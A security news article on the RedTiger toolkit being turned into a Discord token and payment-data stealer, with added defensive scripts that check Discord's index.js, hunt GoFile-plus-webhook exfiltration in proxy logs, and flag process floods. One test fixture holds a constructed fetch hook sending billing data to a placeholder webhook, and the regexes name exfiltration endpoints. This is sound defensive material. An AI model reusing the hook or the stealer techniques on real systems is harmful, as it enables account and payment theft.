Hackers Turn RedTiger Into Data-Stealing Malware Targeting Discord Users
A powerful open-source security tool built for ethical hacking is now being exploited by cybercriminals. Attackers are using RedTiger, a Python-based red-team toolkit, to build an info-stealing malware that targets Discord users and payment data, raising new alarms about the dark side of open-source software.
RedTiger Misused as a Weapon Against Discord Users
RedTiger, originally designed for penetration testing on Windows and Linux, has recently become a favorite among threat actors. The tool includes modules for network scanning, password cracking, open-source intelligence (OSINT) collection, and Discord utilities. However, its malware builder feature has made it easy for attackers to craft info-stealing programs with minimal effort.
According to new findings from cybersecurity firm Netskope, criminals have repurposed RedTiger’s info-stealer component to harvest sensitive data from Discord users, particularly targeting French-speaking communities.
The malicious RedTiger variant collects Discord session tokens, saved payment details, and the account's multi-factor authentication status, posing a serious threat to both personal and financial security.
How the Malware Works
The attackers compile the stealer into a standalone executable with PyInstaller and distribute it under appealing names tied to gaming or Discord tools. When run, it scans the infected machine for local database files and browser data. PyInstaller packaging is not obfuscation: the embedded Python bytecode can be recovered with standard unpacking tools, which is how analysts get at the stealer's logic.
It uses regular expressions to locate Discord tokens in that data and validates each one before pulling the account's details, such as email address, subscription plan, and MFA status. The malware then injects custom JavaScript into the Discord desktop client's core files, notably the index.js loader script, so that its code is loaded together with the client and can intercept every API call and capture events in real time.
Among the most alarming aspects of the attack is its ability to extract saved payment data including PayPal and credit card information from Discord’s local storage.
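To check a Discord install for the loader injection described above, the following script is an added example, not code from the article or from the RedTiger project. It assumes that the Windows client's loader lives at %LOCALAPPDATA%\Discord\app-<version>\modules\discord_desktop_core-<n>\discord_desktop_core\index.js and that the stock file is the single line module.exports = require('./core.asar'); both are assumptions to confirm against a known-clean install. The indicator list and the two samples it checks are constructed.

```python
r"""Integrity check for the Discord desktop client's loader script.

Added example, not from the article or the RedTiger project. Assumptions:
  * the Windows client's loader is at
    %LOCALAPPDATA%\Discord\app-<ver>\modules\discord_desktop_core-<n>\discord_desktop_core\index.js
  * a clean loader is exactly one line: module.exports = require('./core.asar');
Confirm both against a known-clean install before relying on the verdict.
"""
import re
from pathlib import Path
from typing import List

STOCK_LOADER = "module.exports = require('./core.asar');"

# Strings that have no business in the loader; the set is constructed, extend it
# with indicators recovered from real samples.
INDICATORS = {
    "discord_webhook": re.compile(r"discord(?:app)?\.com/api/webhooks/\d+/", re.I),
    "gofile_upload": re.compile(r"(?:api|store\d*)\.gofile\.io", re.I),
    # a fetch/XHR wrapper that looks at login, billing or payment endpoints
    "api_hook": re.compile(r"\b(?:XMLHttpRequest|fetch)\b.*?(?:login|payments?|billing)", re.I | re.S),
    "token_access": re.compile(r"localStorage|webpackChunkdiscord_app|getToken\s*\(", re.I),
}


def analyze_loader(source: str) -> dict:
    """Return a verdict dict for the text of one index.js."""
    meaningful = [ln.strip() for ln in source.splitlines() if ln.strip()]
    stock = meaningful == [STOCK_LOADER]
    hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
    return {
        "stock": stock,
        "indicators": hits,
        "size": len(source),
        "suspicious": (not stock) or bool(hits),
    }


def check_installed(local_appdata: Path) -> List[dict]:
    """Check every Discord version directory found under local_appdata."""
    pattern = "Discord/app-*/modules/discord_desktop_core-*/discord_desktop_core/index.js"
    results = []
    for loader in sorted(local_appdata.glob(pattern)):
        verdict = analyze_loader(loader.read_text(encoding="utf-8", errors="replace"))
        verdict["path"] = str(loader)
        results.append(verdict)
    return results


# Constructed samples so the checker can be exercised offline.
CLEAN_SAMPLE = "module.exports = require('./core.asar');\n"

INJECTED_SAMPLE = """module.exports = require('./core.asar');
// constructed stub mimicking the shape of a stealer injection; it is text for
// the scanner to flag, not a working hook
const WEBHOOK = "https://discord.com/api/webhooks/000000000000000000/constructed";
const realFetch = fetch;
fetch = async (url, opts) => {
  const res = await realFetch(url, opts);
  if (String(url).includes("/api/v9/users/@me/billing")) {
    realFetch(WEBHOOK, { method: "POST", body: JSON.stringify({ url, opts }) });
  }
  return res;
};
"""

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_SAMPLE), ("injected", INJECTED_SAMPLE)):
        print(label, analyze_loader(sample))
    for verdict in check_installed(Path.home() / "AppData" / "Local"):
        print(verdict)
```

The size check matters as much as the indicator list: a loader that is anything other than the one stock line is already worth pulling for review, whether or not it contains a string the scanner recognizes.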
Expanding Beyond Discord to Broader Data Theft
RedTiger’s weaponized variant doesn’t stop at Discord. It also harvests:
Saved browser passwords, cookies, and history
Cryptocurrency wallet files
Game account data, including Roblox and Steam
Sensitive local files with extensions such as .txt, .sql, and .zip
Additionally, it takes screenshots and webcam snapshots, giving attackers a visual glimpse into the victim’s environment.
Below is a summary of what RedTiger targets:
| Data Type | Description |
|---|---|
| Discord | Session tokens, MFA status, saved payment details |
| Browsers | Passwords, cookies, credit cards |
| Crypto Wallets | Private keys and wallet files |
| Games | Roblox and Steam account data |
| Filesystem | Text, SQL, and ZIP files |
Once everything is gathered, the stealer compresses the data and uploads the archive to GoFile, a file-hosting service that allows anonymous sharing. The download link, together with the victim's system metadata, is then posted to a Discord webhook controlled by the attacker. Because the webhook URL is typically embedded in the binary at build time, it is a reliable indicator of compromise: a URL recovered from a sample can be blocked, reported to Discord, and hunted for across proxy logs.
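The upload-then-webhook sequence is a good hunting signal in web proxy logs. The detector below is an added example, not from the article or from RedTiger; the key=value log format, the hostnames, the process names and the "uploadfile" path fragment are constructed or assumed, so map parse_line() and classify() onto your own proxy's schema before use.

```python
"""Hunt for the GoFile-upload-then-Discord-webhook exfiltration chain in proxy logs.

Added example, not from the article or RedTiger. The key=value log format, the
hostnames, the process names and the "uploadfile" path fragment are constructed
or assumed; adapt parse_line() and classify() to your own proxy's schema.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
GOFILE_HOST = re.compile(r"(?:^|\.)gofile\.io$", re.I)
DISCORD_HOST = re.compile(r"^(?:(?:ptb\.|canary\.)?discord\.com|discordapp\.com)$", re.I)
WEBHOOK_PATH = re.compile(r"^/api/webhooks/\d+/", re.I)

# Processes that legitimately talk to discord.com; a constructed allowlist.
DISCORD_CAPABLE = {"discord.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
WINDOW = timedelta(minutes=5)   # upload and webhook must fall within this span


def parse_line(line: str) -> Optional[dict]:
    """Turn one key=value log line into a dict; return None if it is not one."""
    rec = {k: v.strip('"') for k, v in FIELD.findall(line)}
    if "ts" not in rec or "src" not in rec:
        return None
    rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
    return rec


def classify(rec: dict) -> Optional[str]:
    """Label a request as part of the exfil chain, or None."""
    dst = rec.get("dst", "")
    path = rec.get("path", "/")
    method = rec.get("method", "GET").upper()
    proc = rec.get("proc", "").lower()
    if GOFILE_HOST.search(dst) and method == "POST" and "uploadfile" in path.lower():
        return "gofile_upload"
    if DISCORD_HOST.match(dst) and WEBHOOK_PATH.match(path) and method == "POST":
        # A webhook POST from a process outside the allowlist is worth a look on its own.
        return "webhook_post" if proc in DISCORD_CAPABLE else "webhook_post_unusual_process"
    return None


def detect(lines: List[str]) -> List[dict]:
    """Return alerts in log order: medium for odd webhook posters, high for the chain."""
    uploads: Dict[str, List[datetime]] = defaultdict(list)
    alerts: List[dict] = []
    for line in lines:
        rec = parse_line(line)
        kind = classify(rec) if rec else None
        if kind is None:
            continue
        if kind == "gofile_upload":
            uploads[rec["src"]].append(rec["ts"])
            continue
        if kind == "webhook_post_unusual_process":
            alerts.append({"src": rec["src"], "ts": rec["ts"], "severity": "medium",
                           "reason": f"Discord webhook POST from {rec.get('proc')}"})
        # Chain: a GoFile upload from the same source within WINDOW before this webhook POST.
        recent = [t for t in uploads[rec["src"]] if timedelta(0) <= rec["ts"] - t <= WINDOW]
        if recent:
            alerts.append({"src": rec["src"], "ts": rec["ts"], "severity": "high",
                           "reason": "GoFile upload followed by Discord webhook POST"})
    return alerts


# Constructed log lines; the hostnames and the DiscordBooster.exe name are invented.
SAMPLE_LOG = """\
ts=2025-10-23T09:00:01Z src=WS-042 proc=chrome.exe method=GET dst=discord.com path=/channels/@me bytes=812
ts=2025-10-23T09:00:05Z src=WS-042 proc=DiscordBooster.exe method=GET dst=api.gofile.io path=/servers bytes=210
ts=2025-10-23T09:00:07Z src=WS-042 proc=DiscordBooster.exe method=POST dst=store4.gofile.io path=/contents/uploadfile bytes=4190334
ts=2025-10-23T09:00:09Z src=WS-042 proc=DiscordBooster.exe method=POST dst=discord.com path=/api/webhooks/000000000000000000/constructed bytes=1337
ts=2025-10-23T09:10:00Z src=WS-017 proc=discord.exe method=POST dst=discord.com path=/api/v9/channels/1/messages bytes=300
ts=2025-10-23T09:20:00Z src=WS-099 proc=python.exe method=POST dst=discord.com path=/api/webhooks/000000000000000000/constructed bytes=120
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Blocking gofile.io outright is the blunt version of this; where that is not acceptable, the two-stage correlation above keeps the false-positive rate low because a legitimate user rarely uploads to GoFile and posts to a Discord webhook from the same host within minutes.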
Evasion Tactics That Complicate Detection
The modified RedTiger build also tries to evade analysis. It terminates when it detects debuggers or sandbox environments, the tools researchers rely on to analyze malware.
To further frustrate analysis, it spawns hundreds of decoy processes and creates random files to flood forensic tooling, making it harder for analysts and automated systems to pick out the genuinely malicious actions. The flood is itself a loud signal, though: one parent spawning hundreds of children within seconds stands out in process telemetry.
One cybersecurity researcher described it as “a nightmare for sandbox environments,” since its process-spawning technique effectively floods monitoring tools.
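A rate-based detector turns that noise into an alert. The script below is an added example, not from the article or from RedTiger: it runs a sliding window over constructed Sysmon-style events (EventID 1 for process creation, EventID 11 for file creation) and names the process that is doing the flooding. The thresholds, the window, the pids and the DiscordBooster.exe name are all assumptions or invented.

```python
"""Sliding-window detector for the process and file-creation floods described above.

Added example, not from the article or RedTiger. Input is a list of constructed
Sysmon-style events (EventID 1 = process create, EventID 11 = file create); the
thresholds and window are assumptions to tune per environment.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Tuple

PROC_THRESHOLD = 50     # children from one parent inside the window
FILE_THRESHOLD = 200    # files created by one process inside the window
WINDOW = timedelta(seconds=10)


def flood_alerts(events: List[dict],
                 proc_threshold: int = PROC_THRESHOLD,
                 file_threshold: int = FILE_THRESHOLD,
                 window: timedelta = WINDOW) -> List[dict]:
    """Raise one alert per (kind, pid, image) the first time its rate crosses the threshold.

    Process-create events are counted against the parent (the spawner) and file-create
    events against the creating process, so the flooding binary itself is what gets named.
    """
    windows: Dict[Tuple[str, int, str], Deque[datetime]] = defaultdict(deque)
    alerted = set()
    alerts: List[dict] = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["event_id"] == 1:
            key, threshold = ("proc", ev["ppid"], ev["parent_image"]), proc_threshold
        elif ev["event_id"] == 11:
            key, threshold = ("file", ev["pid"], ev["image"]), file_threshold
        else:
            continue
        q = windows[key]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"kind": key[0], "pid": key[1], "image": key[2],
                           "count": len(q), "first": q[0], "last": ev["ts"]})
    return alerts


def build_sample() -> List[dict]:
    """Constructed telemetry: a little normal activity plus the flood."""
    base = datetime(2025, 10, 23, 9, 0, 0)
    stealer = r"C:\Users\victim\Downloads\DiscordBooster.exe"   # invented name
    events = []
    # explorer.exe starts a handful of programs over a minute: benign
    for i in range(5):
        events.append({"ts": base + timedelta(seconds=12 * i), "event_id": 1,
                       "pid": 5000 + i, "ppid": 1200,
                       "image": r"C:\Windows\System32\notepad.exe",
                       "parent_image": r"C:\Windows\explorer.exe"})
    # the stealer (pid 4242) spawns 300 cmd.exe children in three seconds ...
    for i in range(300):
        events.append({"ts": base + timedelta(milliseconds=10 * i), "event_id": 1,
                       "pid": 6000 + i, "ppid": 4242,
                       "image": r"C:\Windows\System32\cmd.exe", "parent_image": stealer})
    # ... and drops 500 junk files into Temp in the same span
    for i in range(500):
        events.append({"ts": base + timedelta(milliseconds=6 * i), "event_id": 11,
                       "pid": 4242, "image": stealer,
                       "target": "C:\\Users\\victim\\AppData\\Local\\Temp\\" + f"{i:04x}.tmp"})
    return events


if __name__ == "__main__":
    for alert in flood_alerts(build_sample()):
        print(alert)
```

Counting against the parent rather than the child is the point: the decoy children are short-lived and look like ordinary cmd.exe launches one at a time, while the parent's spawn rate is what no legitimate user program exhibits.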
How Attackers Spread RedTiger Malware
Netskope has not confirmed the exact infection channels, but the distribution routes typical for lures of this kind are:
Discord servers and community channels
YouTube videos promising free game tools or cheats
Malicious software download sites
Online forums promoting “boosters” or “mods”
Malvertising campaigns on gaming platforms
This trend highlights the continued risk of social engineering, where attackers lure users with attractive downloads that secretly carry malware payloads.
What Users Can Do to Stay Safe
If you suspect your system is infected with RedTiger-based malware, take these actions immediately:
Change your Discord password, which invalidates existing session tokens, and sign out of any unknown sessions under Devices in Discord's user settings. A stolen token grants access without MFA, so this step comes first.
Change your passwords on all linked accounts.
Uninstall the Discord client and delete its local application data before reinstalling from Discord's official website; the injected index.js lives inside the installed module files, so removing the install directory is what actually gets rid of it.
Treat browser-saved passwords and cookies as compromised: rotate the passwords and sign out of active sessions on those sites, since clearing the data locally does not invalidate what was already stolen.
Enable multi-factor authentication (MFA) on all critical accounts. It protects future logins, but it does not protect a session whose token has already been stolen.
Users should never download executables or “tools” from unverified sources, especially ones that claim to enhance games or Discord performance.
Cybersecurity experts recommend sticking to trusted download platforms and ensuring antivirus software is updated. RedTiger’s misuse is another reminder of how open-source projects, though created for good, can be turned into powerful weapons in the wrong hands.
As the open-source security landscape evolves, ethical developers are now being urged to implement safeguards or licensing checks that limit dangerous misuse of their tools.
The rise of RedTiger as a cyber threat underlines a growing challenge for the security community — balancing transparency and freedom of open-source projects with responsible controls against abuse.
In a world where attackers can weaponize legitimate tools within hours, awareness and caution remain the first lines of defense.